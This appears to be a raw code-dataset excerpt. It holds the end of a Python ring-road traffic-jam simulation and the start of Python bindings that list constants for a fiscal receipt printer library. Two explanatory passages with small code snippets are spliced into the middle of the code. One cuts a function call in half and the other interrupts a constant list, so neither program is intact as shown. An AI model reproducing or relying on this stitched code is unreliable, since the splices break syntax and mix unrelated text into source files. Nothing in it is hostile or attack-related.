abs(cars[i-1].theta - cars[i].theta)*circular_radius\n\t\telse: current_gap = abs(cars[num_cars-1].theta + 2*pi - cars[0].theta)*circular_radius\n\t\t\n\t\tif current_gap < min_gap: \t\t\t\t\t# warning \n\t\t\t#cars[i].speed = 0 \t\t\t\t\t\t\n\t\t\tcars[i].speed = cars[i].speed * 0.99 \t\n\t\t\tif i != 0: cars[i].theta = cars[i-1].theta - to_degree(min_gap)\n\t\t\telse: cars[0].theta = cars[num_cars-1].theta - to_degree(min_gap) + 2*pi\n\t\t\tnext_action[i, :] *= 0 \t\t\t\t\t# reset next_action\n\t\t\tcars[i].color = color.white\n\t\t\terror_count += 1\n\t\telse:\n\t\t\tif current_gap < cars[i].save_gap: \n\t\t\t\tnext_action[i][int(cars[i].reaction_time_decel/dt)] = -1\n\t\t\t\tnext_action[i][int(cars[i].reaction_time_decel/dt)+1:] *= 0 \t\t# reset to zero if new action interupt\n\t\t\telse: \n\t\t\t\tnext_action[i][int(cars[i].reaction_time_accel/dt)] = 1\n\t\t\t\tnext_action[i][int(cars[i].reaction_time_accel/dt)+1:] *= 0\n\t\t\tif next_action[i][0] == 1: cars[i].speed = cars[i].speed + cars[i].accel*dt\n\t\t\telif next_action[i][0] == -1: cars[i].speed = cars[i].speed - cars[i].decel*dt\n\t\t\tcars[i].speed = min(cars[i].max_speed, max(cars[i].min_speed, cars[i].speed)) # min_max clip\n\t\t\tcars[i].theta = cars[i].theta + to_degree(cars[i].speed * dt)\n\t\t\tif cars[i].speed > remove_error_speed: cars[i].color = get_color(i, 
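The simulation above encodes driver reaction time as a per-car action queue: column k holds the action that fires k*dt seconds from now, and every tick shifts the queue left by one slot. The sketch below replays the mechanism and adds one defensive detail of its own, zeroing the column the left-shift leaves stale:

import numpy as np

dt = 0.002
max_idle_time = 5.0
num_cars = 2

# 1 = accelerate, -1 = brake, 0 = do nothing.
next_action = np.zeros((num_cars, int(max_idle_time / dt)), dtype=np.int8)

reaction_time = 1.5
next_action[0, int(reaction_time / dt)] = -1     # brake scheduled 1.5 s out

# One simulation tick: shift every queue left by one slot.
next_action[:, :-1] = np.copy(next_action[:, 1:])
next_action[:, -1] = 0          # the shift duplicates the last column; clear it
action_now = next_action[:, 0]  # slot 0 is what each driver executes this tick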
cars[i].speed, use_speed_color)\n\t\tcars[i].pos = vec(circular_radius*cos(cars[i].theta), circular_radius*sin(cars[i].theta), 0)\n\t\n\tt += 1\n\tif t % 3000 == 0: \n\t\toutput_situation(output_number = min(4, num_cars))\n\t\t\n","sub_path":"demo_traffic_jam.py","file_name":"demo_traffic_jam.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223394534","text":"# -*- coding: utf-8 -*-\n\nimport ctypes\nimport sys\nimport json\nimport datetime\nimport os\nimport platform\nif platform.system() == 'Windows':\n from _winreg import *\n\nif sys.version_info[0] == 3:\n RANGE = range\n TEXT = str\nelse:\n TEXT = basestring\n RANGE = xrange\n\n\nclass IFptr(object):\n (\n LIBFPTR_PARAM_TEXT,\n LIBFPTR_PARAM_TEXT_WRAP,\n LIBFPTR_PARAM_ALIGNMENT,\n LIBFPTR_PARAM_FONT,\n LIBFPTR_PARAM_FONT_DOUBLE_WIDTH,\n LIBFPTR_PARAM_FONT_DOUBLE_HEIGHT,\n LIBFPTR_PARAM_LINESPACING,\n LIBFPTR_PARAM_BRIGHTNESS,\n LIBFPTR_PARAM_MODEL,\n LIBFPTR_PARAM_RECEIPT_TYPE,\n LIBFPTR_PARAM_REPORT_TYPE,\n LIBFPTR_PARAM_MODE,\n LIBFPTR_PARAM_EXTERNAL_DEVICE_TYPE,\n LIBFPTR_PARAM_EXTERNAL_DEVICE_DATA,\n LIBFPTR_PARAM_FREQUENCY,\n LIBFPTR_PARAM_DURATION,\n LIBFPTR_PARAM_CUT_TYPE,\n LIBFPTR_PARAM_DRAWER_ON_TIMEOUT,\n LIBFPTR_PARAM_DRAWER_OFF_TIMEOUT,\n LIBFPTR_PARAM_DRAWER_ON_QUANTITY,\n LIBFPTR_PARAM_TIMEOUT_ENQ,\n LIBFPTR_PARAM_COMMAND_BUFFER,\n LIBFPTR_PARAM_ANSWER_BUFFER,\n LIBFPTR_PARAM_SERIAL_NUMBER,\n LIBFPTR_PARAM_MANUFACTURER_CODE,\n LIBFPTR_PARAM_NO_NEED_ANSWER,\n LIBFPTR_PARAM_INFO_DISCOUNT_SUM,\n LIBFPTR_PARAM_USE_ONLY_TAX_TYPE,\n LIBFPTR_PARAM_PAYMENT_TYPE,\n LIBFPTR_PARAM_PAYMENT_SUM,\n LIBFPTR_PARAM_REMAINDER,\n LIBFPTR_PARAM_CHANGE,\n LIBFPTR_PARAM_DEPARTMENT,\n LIBFPTR_PARAM_TAX_TYPE,\n LIBFPTR_PARAM_TAX_SUM,\n LIBFPTR_PARAM_TAX_MODE,\n LIBFPTR_PARAM_RECEIPT_ELECTRONICALLY,\n LIBFPTR_PARAM_USER_PASSWORD,\n LIBFPTR_PARAM_SCALE,\n LIBFPTR_PARAM_LEFT_MARGIN,\n LIBFPTR_PARAM_BARCODE,\n LIBFPTR_PARAM_BARCODE_TYPE,\n LIBFPTR_PARAM_BARCODE_PRINT_TEXT,\n LIBFPTR_PARAM_BARCODE_VERSION,\n LIBFPTR_PARAM_BARCODE_CORRECTION,\n LIBFPTR_PARAM_BARCODE_COLUMNS,\n LIBFPTR_PARAM_BARCODE_INVERT,\n LIBFPTR_PARAM_HEIGHT,\n LIBFPTR_PARAM_WIDTH,\n LIBFPTR_PARAM_FILENAME,\n LIBFPTR_PARAM_PICTURE_NUMBER,\n LIBFPTR_PARAM_DATA_TYPE,\n LIBFPTR_PARAM_OPERATOR_ID,\n LIBFPTR_PARAM_LOGICAL_NUMBER,\n LIBFPTR_PARAM_DATE_TIME,\n LIBFPTR_PARAM_FISCAL,\n LIBFPTR_PARAM_SHIFT_STATE,\n LIBFPTR_PARAM_CASHDRAWER_OPENED,\n LIBFPTR_PARAM_RECEIPT_PAPER_PRESENT,\n LIBFPTR_PARAM_COVER_OPENED,\n LIBFPTR_PARAM_SUBMODE,\n LIBFPTR_PARAM_RECEIPT_NUMBER,\n LIBFPTR_PARAM_DOCUMENT_NUMBER,\n LIBFPTR_PARAM_SHIFT_NUMBER,\n LIBFPTR_PARAM_RECEIPT_SUM,\n LIBFPTR_PARAM_RECEIPT_LINE_LENGTH,\n LIBFPTR_PARAM_RECEIPT_LINE_LENGTH_PIX,\n LIBFPTR_PARAM_MODEL_NAME,\n LIBFPTR_PARAM_UNIT_VERSION,\n LIBFPTR_PARAM_PRINTER_CONNECTION_LOST,\n LIBFPTR_PARAM_PRINTER_ERROR,\n LIBFPTR_PARAM_CUT_ERROR,\n LIBFPTR_PARAM_PRINTER_OVERHEAT,\n LIBFPTR_PARAM_UNIT_TYPE,\n LIBFPTR_PARAM_LICENSE_NUMBER,\n LIBFPTR_PARAM_LICENSE_ENTERED,\n LIBFPTR_PARAM_LICENSE,\n LIBFPTR_PARAM_SUM,\n LIBFPTR_PARAM_COUNT,\n LIBFPTR_PARAM_COUNTER_TYPE,\n LIBFPTR_PARAM_STEP_COUNTER_TYPE,\n LIBFPTR_PARAM_ERROR_TAG_NUMBER,\n LIBFPTR_PARAM_TABLE,\n LIBFPTR_PARAM_ROW,\n LIBFPTR_PARAM_FIELD,\n LIBFPTR_PARAM_FIELD_VALUE,\n LIBFPTR_PARAM_FN_DATA_TYPE,\n LIBFPTR_PARAM_TAG_NUMBER,\n LIBFPTR_PARAM_TAG_VALUE,\n LIBFPTR_PARAM_DOCUMENTS_COUNT,\n LIBFPTR_PARAM_FISCAL_SIGN,\n LIBFPTR_PARAM_DEVICE_FFD_VERSION,\n LIBFPTR_PARAM_FN_FFD_VERSION,\n 
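The gap measurement in the main loop above branches on i == 0 to handle the wrap-around between the last car and the first. Folding the angle difference modulo 2*pi covers both cases in one expression:

from math import pi

def gap_ahead(theta_front, theta_back, radius):
    # Fold the angular difference into [0, 2*pi) so the wrap-around
    # (car 0 chasing the last car) needs no special case.
    return ((theta_front - theta_back) % (2 * pi)) * radius

print(gap_ahead(0.1, 6.2, 230 / (2 * pi)))  # about 6.7 m, across the 0/2*pi seam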
LIBFPTR_PARAM_FFD_VERSION,\n LIBFPTR_PARAM_CHECK_SUM,\n LIBFPTR_PARAM_COMMODITY_NAME,\n LIBFPTR_PARAM_PRICE,\n LIBFPTR_PARAM_QUANTITY,\n LIBFPTR_PARAM_POSITION_SUM,\n LIBFPTR_PARAM_FN_TYPE,\n LIBFPTR_PARAM_FN_VERSION,\n LIBFPTR_PARAM_REGISTRATIONS_REMAIN,\n LIBFPTR_PARAM_REGISTRATIONS_COUNT,\n LIBFPTR_PARAM_NO_ERROR_IF_NOT_SUPPORTED,\n LIBFPTR_PARAM_OFD_EXCHANGE_STATUS,\n LIBFPTR_PARAM_FN_ERROR_DATA,\n LIBFPTR_PARAM_FN_ERROR_CODE,\n LIBFPTR_PARAM_ENVD_MODE,\n LIBFPTR_PARAM_DOCUMENT_CLOSED,\n LIBFPTR_PARAM_JSON_DATA,\n LIBFPTR_PARAM_COMMAND_SUBSYSTEM,\n LIBFPTR_PARAM_FN_OPERATION_TYPE,\n LIBFPTR_PARAM_FN_STATE,\n LIBFPTR_PARAM_ENVD_MODE_ENABLED,\n LIBFPTR_PARAM_SETTING_ID,\n LIBFPTR_PARAM_SETTING_VALUE,\n LIBFPTR_PARAM_MAPPING_KEY,\n LIBFPTR_PARAM_MAPPING_VALUE,\n LIBFPTR_PARAM_COMMODITY_PIECE,\n LIBFPTR_PARAM_POWER_SOURCE_TYPE,\n LIBFPTR_PARAM_BATTERY_CHARGE,\n LIBFPTR_PARAM_VOLTAGE,\n LIBFPTR_PARAM_USE_BATTERY,\n LIBFPTR_PARAM_BATTERY_CHARGING,\n LIBFPTR_PARAM_CAN_PRINT_WHILE_ON_BATTERY,\n LIBFPTR_PARAM_MAC_ADDRESS,\n LIBFPTR_PARAM_FN_FISCAL,\n LIBFPTR_PARAM_NETWORK_ERROR,\n LIBFPTR_PARAM_OFD_ERROR,\n LIBFPTR_PARAM_FN_ERROR,\n LIBFPTR_PARAM_COMMAND_CODE,\n LIBFPTR_PARAM_PRINTER_TEMPERATURE,\n LIBFPTR_PARAM_RECORDS_TYPE,\n LIBFPTR_PARAM_OFD_FISCAL_SIGN,\n LIBFPTR_PARAM_HAS_OFD_TICKET,\n LIBFPTR_PARAM_NO_SERIAL_NUMBER,\n LIBFPTR_PARAM_RTC_FAULT,\n LIBFPTR_PARAM_SETTINGS_FAULT,\n LIBFPTR_PARAM_COUNTERS_FAULT,\n LIBFPTR_PARAM_USER_MEMORY_FAULT,\n LIBFPTR_PARAM_SERVICE_COUNTERS_FAULT,\n LIBFPTR_PARAM_ATTRIBUTES_FAULT,\n LIBFPTR_PARAM_FN_FAULT,\n LIBFPTR_PARAM_INVALID_FN,\n LIBFPTR_PARAM_HARD_FAULT,\n LIBFPTR_PARAM_MEMORY_MANAGER_FAULT,\n LIBFPTR_PARAM_SCRIPTS_FAULT,\n LIBFPTR_PARAM_FULL_RESET,\n LIBFPTR_PARAM_WAIT_FOR_REBOOT,\n LIBFPTR_PARAM_SCALE_PERCENT,\n LIBFPTR_PARAM_FN_NEED_REPLACEMENT,\n LIBFPTR_PARAM_FN_RESOURCE_EXHAUSTED,\n LIBFPTR_PARAM_FN_MEMORY_OVERFLOW,\n LIBFPTR_PARAM_FN_OFD_TIMEOUT,\n LIBFPTR_PARAM_FN_CRITICAL_ERROR,\n LIBFPTR_PARAM_OFD_MESSAGE_READ,\n LIBFPTR_PARAM_DEVICE_MIN_FFD_VERSION,\n LIBFPTR_PARAM_DEVICE_MAX_FFD_VERSION,\n LIBFPTR_PARAM_DEVICE_UPTIME,\n LIBFPTR_PARAM_NOMENCLATURE_TYPE,\n LIBFPTR_PARAM_GTIN,\n LIBFPTR_PARAM_FN_DOCUMENT_TYPE,\n LIBFPTR_PARAM_NETWORK_ERROR_TEXT,\n LIBFPTR_PARAM_FN_ERROR_TEXT,\n LIBFPTR_PARAM_OFD_ERROR_TEXT,\n LIBFPTR_PARAM_USER_SCRIPT_ID,\n LIBFPTR_PARAM_USER_SCRIPT_PARAMETER,\n LIBFPTR_PARAM_USER_MEMORY_OPERATION,\n LIBFPTR_PARAM_USER_MEMORY_DATA,\n LIBFPTR_PARAM_USER_MEMORY_STRING,\n LIBFPTR_PARAM_USER_MEMORY_ADDRESS,\n LIBFPTR_PARAM_FN_PRESENT,\n LIBFPTR_PARAM_BLOCKED,\n LIBFPTR_PARAM_DOCUMENT_PRINTED,\n LIBFPTR_PARAM_DISCOUNT_SUM,\n LIBFPTR_PARAM_SURCHARGE_SUM,\n LIBFPTR_PARAM_LK_USER_CODE,\n LIBFPTR_PARAM_LICENSE_COUNT,\n LIBFPTR_PARAM_DEFER,\n LIBFPTR_PARAM_CAP_54FZ,\n LIBFPTR_PARAM_CAP_MANUAL_CLICHE_CONTROL,\n ) = RANGE(65536, 65717)\n\n (\n LIBFPTR_OK,\n LIBFPTR_ERROR_CONNECTION_DISABLED,\n LIBFPTR_ERROR_NO_CONNECTION,\n LIBFPTR_ERROR_PORT_BUSY,\n LIBFPTR_ERROR_PORT_NOT_AVAILABLE,\n LIBFPTR_ERROR_INCORRECT_DATA,\n LIBFPTR_ERROR_INTERNAL,\n LIBFPTR_ERROR_UNSUPPORTED_CAST,\n LIBFPTR_ERROR_NO_REQUIRED_PARAM,\n LIBFPTR_ERROR_INVALID_SETTINGS,\n LIBFPTR_ERROR_NOT_CONFIGURED,\n LIBFPTR_ERROR_NOT_SUPPORTED,\n LIBFPTR_ERROR_INVALID_MODE,\n LIBFPTR_ERROR_INVALID_PARAM,\n LIBFPTR_ERROR_NOT_LOADED,\n LIBFPTR_ERROR_UNKNOWN,\n LIBFPTR_ERROR_INVALID_SUM,\n LIBFPTR_ERROR_INVALID_QUANTITY,\n LIBFPTR_ERROR_CASH_COUNTER_OVERFLOW,\n LIBFPTR_ERROR_LAST_OPERATION_STORNO_DENIED,\n LIBFPTR_ERROR_STORNO_BY_CODE_DENIED,\n 
LIBFPTR_ERROR_LAST_OPERATION_NOT_REPEATABLE,\n LIBFPTR_ERROR_DISCOUNT_NOT_REPEATABLE,\n LIBFPTR_ERROR_DISCOUNT_DENIED,\n LIBFPTR_ERROR_INVALID_COMMODITY_CODE,\n LIBFPTR_ERROR_INVALID_COMMODITY_BARCODE,\n LIBFPTR_ERROR_INVALID_COMMAND_FORMAT,\n LIBFPTR_ERROR_INVALID_COMMAND_LENGTH,\n LIBFPTR_ERROR_BLOCKED_IN_DATE_INPUT_MODE,\n LIBFPTR_ERROR_NEED_DATE_ACCEPT,\n LIBFPTR_ERROR_NO_MORE_DATA,\n LIBFPTR_ERROR_NO_ACCEPT_OR_CANCEL,\n LIBFPTR_ERROR_BLOCKED_BY_REPORT_INTERRUPTION,\n LIBFPTR_ERROR_DISABLE_CASH_CONTROL_DENIED,\n LIBFPTR_ERROR_MODE_BLOCKED,\n LIBFPTR_ERROR_CHECK_DATE_TIME,\n LIBFPTR_ERROR_DATE_TIME_LESS_THAN_FS,\n LIBFPTR_ERROR_CLOSE_ARCHIVE_DENIED,\n LIBFPTR_ERROR_COMMODITY_NOT_FOUND,\n LIBFPTR_ERROR_WEIGHT_BARCODE_WITH_INVALID_QUANTITY,\n LIBFPTR_ERROR_RECEIPT_BUFFER_OVERFLOW,\n LIBFPTR_ERROR_QUANTITY_TOO_FEW,\n LIBFPTR_ERROR_STORNO_TOO_MUCH,\n LIBFPTR_ERROR_BLOCKED_COMMODITY_NOT_FOUND,\n LIBFPTR_ERROR_NO_PAPER,\n LIBFPTR_ERROR_COVER_OPENED,\n LIBFPTR_ERROR_PRINTER_FAULT,\n LIBFPTR_ERROR_MECHANICAL_FAULT,\n LIBFPTR_ERROR_INVALID_RECEIPT_TYPE,\n LIBFPTR_ERROR_INVALID_UNIT_TYPE,\n LIBFPTR_ERROR_NO_MEMORY,\n LIBFPTR_ERROR_PICTURE_NOT_FOUND,\n LIBFPTR_ERROR_NONCACH_PAYMENTS_TOO_MUCH,\n LIBFPTR_ERROR_RETURN_DENIED,\n LIBFPTR_ERROR_PAYMENTS_OVERFLOW,\n LIBFPTR_ERROR_BUSY,\n LIBFPTR_ERROR_GSM,\n LIBFPTR_ERROR_INVALID_DISCOUNT,\n LIBFPTR_ERROR_OPERATION_AFTER_DISCOUNT_DENIED,\n LIBFPTR_ERROR_INVALID_DEPARTMENT,\n LIBFPTR_ERROR_INVALID_PAYMENT_TYPE,\n LIBFPTR_ERROR_MULTIPLICATION_OVERFLOW,\n LIBFPTR_ERROR_DENIED_BY_SETTINGS,\n LIBFPTR_ERROR_TOTAL_OVERFLOW,\n LIBFPTR_ERROR_DENIED_IN_ANNULATION_RECEIPT,\n LIBFPTR_ERROR_JOURNAL_OVERFLOW,\n LIBFPTR_ERROR_NOT_FULLY_PAID,\n LIBFPTR_ERROR_DENIED_IN_RETURN_RECEIPT,\n LIBFPTR_ERROR_SHIFT_EXPIRED,\n LIBFPTR_ERROR_DENIED_IN_SELL_RECEIPT,\n LIBFPTR_ERROR_FISCAL_MEMORY_OVERFLOW,\n LIBFPTR_ERROR_INVALID_PASSWORD,\n LIBFPTR_ERROR_JOURNAL_BUSY,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_SHIFT,\n LIBFPTR_ERROR_INVALID_TABLE_NUMBER,\n LIBFPTR_ERROR_INVALID_ROW_NUMBER,\n LIBFPTR_ERROR_INVALID_FIELD_NUMBER,\n LIBFPTR_ERROR_INVALID_DATE_TIME,\n LIBFPTR_ERROR_INVALID_STORNO_SUM,\n LIBFPTR_ERROR_CHANGE_CALCULATION,\n LIBFPTR_ERROR_NO_CASH,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_RECEIPT,\n LIBFPTR_ERROR_DENIED_IN_OPENED_RECEIPT,\n LIBFPTR_ERROR_DENIED_IN_OPENED_SHIFT,\n LIBFPTR_ERROR_SERIAL_NUMBER_ALREADY_ENTERED,\n LIBFPTR_ERROR_TOO_MUCH_REREGISTRATIONS,\n LIBFPTR_ERROR_INVALID_SHIFT_NUMBER,\n LIBFPTR_ERROR_INVALID_SERIAL_NUMBER,\n LIBFPTR_ERROR_INVALID_RNM_VATIN,\n LIBFPTR_ERROR_FISCAL_PRINTER_NOT_ACTIVATED,\n LIBFPTR_ERROR_SERIAL_NUMBER_NOT_ENTERED,\n LIBFPTR_ERROR_NO_MORE_REPORTS,\n LIBFPTR_ERROR_MODE_NOT_ACTIVATED,\n LIBFPTR_ERROR_RECORD_NOT_FOUND_IN_JOURNAL,\n LIBFPTR_ERROR_INVALID_LICENSE,\n LIBFPTR_ERROR_NEED_FULL_RESET,\n LIBFPTR_ERROR_DENIED_BY_LICENSE,\n LIBFPTR_ERROR_DISCOUNT_CANCELLATION_DENIED,\n LIBFPTR_ERROR_CLOSE_RECEIPT_DENIED,\n LIBFPTR_ERROR_INVALID_ROUTE_NUMBER,\n LIBFPTR_ERROR_INVALID_START_ZONE_NUMBER,\n LIBFPTR_ERROR_INVALID_END_ZONE_NUMBER,\n LIBFPTR_ERROR_INVALID_RATE_TYPE,\n LIBFPTR_ERROR_INVALID_RATE,\n LIBFPTR_ERROR_FISCAL_MODULE_EXCHANGE,\n LIBFPTR_ERROR_NEED_TECHNICAL_SUPPORT,\n LIBFPTR_ERROR_SHIFT_NUMBERS_DID_NOT_MATCH,\n LIBFPTR_ERROR_DEVICE_NOT_FOUND,\n LIBFPTR_ERROR_EXTERNAL_DEVICE_CONNECTION,\n LIBFPTR_ERROR_DISPENSER_INVALID_STATE,\n LIBFPTR_ERROR_INVALID_POSITIONS_COUNT,\n LIBFPTR_ERROR_DISPENSER_INVALID_NUMBER,\n LIBFPTR_ERROR_INVALID_DIVIDER,\n LIBFPTR_ERROR_FN_ACTIVATION_DENIED,\n LIBFPTR_ERROR_PRINTER_OVERHEAT,\n LIBFPTR_ERROR_FN_EXCHANGE,\n 
LIBFPTR_ERROR_FN_INVALID_FORMAT,\n LIBFPTR_ERROR_FN_INVALID_STATE,\n LIBFPTR_ERROR_FN_FAULT,\n LIBFPTR_ERROR_FN_CRYPTO_FAULT,\n LIBFPTR_ERROR_FN_EXPIRED,\n LIBFPTR_ERROR_FN_OVERFLOW,\n LIBFPTR_ERROR_FN_INVALID_DATE_TIME,\n LIBFPTR_ERROR_FN_NO_MORE_DATA,\n LIBFPTR_ERROR_FN_TOTAL_OVERFLOW,\n LIBFPTR_ERROR_BUFFER_OVERFLOW,\n LIBFPTR_ERROR_PRINT_SECOND_COPY_DENIED,\n LIBFPTR_ERROR_NEED_RESET_JOURNAL,\n LIBFPTR_ERROR_TAX_SUM_TOO_MUCH,\n LIBFPTR_ERROR_TAX_ON_LAST_OPERATION_DENIED,\n LIBFPTR_ERROR_INVALID_FN_NUMBER,\n LIBFPTR_ERROR_TAX_CANCEL_DENIED,\n LIBFPTR_ERROR_LOW_BATTERY,\n LIBFPTR_ERROR_FN_INVALID_COMMAND,\n LIBFPTR_ERROR_FN_COMMAND_OVERFLOW,\n LIBFPTR_ERROR_FN_NO_TRANSPORT_CONNECTION,\n LIBFPTR_ERROR_FN_CRYPTO_HAS_EXPIRED,\n LIBFPTR_ERROR_FN_RESOURCE_HAS_EXPIRED,\n LIBFPTR_ERROR_INVALID_MESSAGE_FROM_OFD,\n LIBFPTR_ERROR_FN_HAS_NOT_SEND_DOCUMENTS,\n LIBFPTR_ERROR_FN_TIMEOUT,\n LIBFPTR_ERROR_FN_SHIFT_EXPIRED,\n LIBFPTR_ERROR_FN_INVALID_TIME_DIFFERENCE,\n LIBFPTR_ERROR_INVALID_TAXATION_TYPE,\n LIBFPTR_ERROR_INVALID_TAX_TYPE,\n LIBFPTR_ERROR_INVALID_COMMODITY_PAYMENT_TYPE,\n LIBFPTR_ERROR_INVALID_COMMODITY_CODE_TYPE,\n LIBFPTR_ERROR_EXCISABLE_COMMODITY_DENIED,\n LIBFPTR_ERROR_FISCAL_PROPERTY_WRITE,\n LIBFPTR_ERROR_INVALID_COUNTER_TYPE,\n LIBFPTR_ERROR_CUTTER_FAULT,\n LIBFPTR_ERROR_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_INVALID_LEFT_MARGIN,\n LIBFPTR_ERROR_INVALID_ALIGNMENT,\n LIBFPTR_ERROR_INVALID_TAX_MODE,\n LIBFPTR_ERROR_FILE_NOT_FOUND,\n LIBFPTR_ERROR_PICTURE_TOO_BIG,\n LIBFPTR_ERROR_INVALID_BARCODE_PARAMS,\n LIBFPTR_ERROR_FISCAL_PROPERTY_DENIED,\n LIBFPTR_ERROR_FN_INTERFACE,\n LIBFPTR_ERROR_DATA_DUPLICATE,\n LIBFPTR_ERROR_NO_REQUIRED_FISCAL_PROPERTY,\n LIBFPTR_ERROR_FN_READ_DOCUMENT,\n LIBFPTR_ERROR_FLOAT_OVERFLOW,\n LIBFPTR_ERROR_INVALID_SETTING_VALUE,\n LIBFPTR_ERROR_HARD_FAULT,\n LIBFPTR_ERROR_FN_NOT_FOUND,\n LIBFPTR_ERROR_INVALID_AGENT_FISCAL_PROPERTY,\n LIBFPTR_ERROR_INVALID_FISCAL_PROPERTY_VALUE_1002_1056,\n LIBFPTR_ERROR_INVALID_FISCAL_PROPERTY_VALUE_1002_1017,\n LIBFPTR_ERROR_SCRIPT,\n LIBFPTR_ERROR_INVALID_USER_MEMORY_INDEX,\n LIBFPTR_ERROR_NO_ACTIVE_OPERATOR,\n LIBFPTR_ERROR_REGISTRATION_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_CLOSE_FN_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_OPEN_SHIFT_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_OFD_EXCHANGE_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_CLOSE_RECEIPT_INTERRUPTED,\n LIBFPTR_ERROR_FN_QUERY_INTERRUPTED,\n LIBFPTR_ERROR_RTC_FAULT,\n LIBFPTR_ERROR_MEMORY_FAULT,\n LIBFPTR_ERROR_CHIP_FAULT,\n LIBFPTR_ERROR_TEMPLATES_CORRUPTED,\n LIBFPTR_ERROR_INVALID_MAC_ADDRESS,\n LIBFPTR_ERROR_INVALID_SCRIPT_NUMBER,\n LIBFPTR_ERROR_SCRIPTS_FAULT,\n LIBFPTR_ERROR_INVALID_SCRIPTS_VERSION,\n LIBFPTR_ERROR_INVALID_CLICHE_FORMAT,\n LIBFPTR_ERROR_WAIT_FOR_REBOOT,\n LIBFPTR_ERROR_NO_LICENSE,\n LIBFPTR_ERROR_INVALID_FFD_VERSION,\n LIBFPTR_ERROR_CHANGE_SETTING_DENIED,\n LIBFPTR_ERROR_INVALID_NOMENCLATURE_TYPE,\n LIBFPTR_ERROR_INVALID_GTIN,\n LIBFPTR_ERROR_NEGATIVE_MATH_RESULT,\n LIBFPTR_ERROR_FISCAL_PROPERTIES_COMBINATION,\n LIBFPTR_ERROR_OPERATOR_LOGIN,\n LIBFPTR_ERROR_INVALID_INTERNET_CHANNEL,\n LIBFPTR_ERROR_DATETIME_NOT_SYNCRONIZED,\n LIBFPTR_ERROR_JOURNAL,\n LIBFPTR_ERROR_DENIED_IN_OPENED_DOC,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_DOC,\n ) = RANGE(0, 202)\n\n (\n LIBFPTR_ERROR_BASE_WEB,\n LIBFPTR_ERROR_RECEIPT_PARSE_ERROR,\n LIBFPTR_ERROR_INTERRUPTED_BY_PREVIOUS_ERRORS,\n ) = RANGE(500, 503)\n\n (\n LIBFPTR_PORT_COM,\n LIBFPTR_PORT_USB,\n LIBFPTR_PORT_TCPIP,\n LIBFPTR_PORT_BLUETOOTH,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_PORT_BITS_7,\n LIBFPTR_PORT_BITS_8,\n ) = RANGE(7, 9)\n\n (\n 
LIBFPTR_PORT_PARITY_NO,\n LIBFPTR_PORT_PARITY_ODD,\n LIBFPTR_PORT_PARITY_EVEN,\n LIBFPTR_PORT_PARITY_MARK,\n LIBFPTR_PORT_PARITY_SPACE,\n ) = RANGE(0, 5)\n\n (\n LIBFPTR_PORT_SB_1,\n LIBFPTR_PORT_SB_1_5,\n LIBFPTR_PORT_SB_2,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_BT_EAN_8,\n LIBFPTR_BT_EAN_13,\n LIBFPTR_BT_UPC_A,\n LIBFPTR_BT_UPC_E,\n LIBFPTR_BT_CODE_39,\n LIBFPTR_BT_CODE_93,\n LIBFPTR_BT_CODE_128,\n LIBFPTR_BT_CODABAR,\n LIBFPTR_BT_ITF,\n LIBFPTR_BT_ITF_14,\n LIBFPTR_BT_GS1_128,\n LIBFPTR_BT_QR,\n LIBFPTR_BT_PDF417,\n LIBFPTR_BT_AZTEC,\n ) = RANGE(0, 14)\n\n (\n LIBFPTR_BC_DEFAULT,\n LIBFPTR_BC_0,\n LIBFPTR_BC_1,\n LIBFPTR_BC_2,\n LIBFPTR_BC_3,\n LIBFPTR_BC_4,\n LIBFPTR_BC_5,\n LIBFPTR_BC_6,\n LIBFPTR_BC_7,\n LIBFPTR_BC_8,\n ) = RANGE(0, 10)\n\n (\n LIBFPTR_TM_POSITION,\n LIBFPTR_TM_UNIT,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_SCT_OVERALL,\n LIBFPTR_SCT_FORWARD,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_CT_ROLLUP,\n LIBFPTR_CT_RESETTABLE,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_SS_CLOSED,\n LIBFPTR_SS_OPENED,\n LIBFPTR_SS_EXPIRED,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_CT_FULL,\n LIBFPTR_CT_PART,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_ALIGNMENT_LEFT,\n LIBFPTR_ALIGNMENT_CENTER,\n LIBFPTR_ALIGNMENT_RIGHT,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_TW_NONE,\n LIBFPTR_TW_WORDS,\n LIBFPTR_TW_CHARS,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_FNT_DEBUG,\n LIBFPTR_FNT_RELEASE,\n LIBFPTR_FNT_UNKNOWN,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_RT_CLOSE_SHIFT,\n LIBFPTR_RT_X,\n LIBFPTR_RT_LAST_DOCUMENT,\n LIBFPTR_RT_OFD_EXCHANGE_STATUS,\n LIBFPTR_RT_KKT_DEMO,\n LIBFPTR_RT_KKT_INFO,\n LIBFPTR_RT_OFD_TEST,\n LIBFPTR_RT_FN_DOC_BY_NUMBER,\n LIBFPTR_RT_QUANTITY,\n LIBFPTR_RT_DEPARTMENTS,\n LIBFPTR_RT_OPERATORS,\n LIBFPTR_RT_HOURS,\n LIBFPTR_RT_FN_REGISTRATIONS,\n LIBFPTR_RT_FN_SHIFT_TOTAL_COUNTERS,\n LIBFPTR_RT_FN_TOTAL_COUNTERS,\n LIBFPTR_RT_FN_NOT_SENT_DOCUMENTS_COUNTERS,\n LIBFPTR_RT_COMMODITIES_BY_TAXATION_TYPES,\n LIBFPTR_RT_COMMODITIES_BY_DEPARTMENTS,\n LIBFPTR_RT_COMMODITIES_BY_SUMS,\n LIBFPTR_RT_START_SERVICE,\n ) = RANGE(0, 20)\n\n (\n LIBFPTR_PT_CASH,\n LIBFPTR_PT_ELECTRONICALLY,\n LIBFPTR_PT_PREPAID,\n LIBFPTR_PT_CREDIT,\n LIBFPTR_PT_OTHER,\n 